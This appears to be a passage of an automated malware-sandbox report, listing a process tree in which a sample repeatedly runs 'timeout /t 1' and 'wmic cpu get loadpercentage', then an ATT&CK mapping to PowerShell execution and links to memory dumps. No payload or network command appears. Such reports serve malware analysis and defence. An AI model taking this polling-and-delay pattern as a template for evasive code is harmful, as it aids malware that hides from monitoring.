
C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2672

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1152

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1300

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2616

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2680

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2764

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2580

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2912

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2588

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2228

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2140

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1952

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1980

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1720

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1644

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1444

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1716

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1932

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1664

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2420-4-0x000007FEF514E000-0x000007FEF514F000-memory.dmp

Filesize
4KB

Download
memory/2420-5-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2420-7-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/2420-8-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-9-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-10-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download
memory/2420-11-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

Filesize
9.6MB

Download